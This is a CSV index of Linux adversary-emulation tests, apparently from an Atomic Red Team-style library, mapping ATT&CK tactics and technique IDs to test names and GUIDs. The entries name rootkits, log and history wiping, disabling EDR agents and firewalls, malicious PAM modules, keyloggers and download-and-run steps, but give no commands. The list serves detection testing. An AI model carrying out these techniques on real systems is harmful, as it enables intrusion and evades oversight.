defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,13,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,14,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,15,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,2,Copy and Delete Mailbox Data on Linux,25e2be0e-96f7-4417-bd16-a4a2500e3802,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,5,Copy and Modify Mailbox Data on Linux,6d99f93c-da56-49e3-b195-163090ace4f6,bash
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,Disable iptables,7784c64e-ed0b-4b65-bf63-c86db229fd56,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,Modify/delete iptables firewall rules,899a7fb5-d197-4951-8614-f19ac4a73ad4,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Clear Paging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
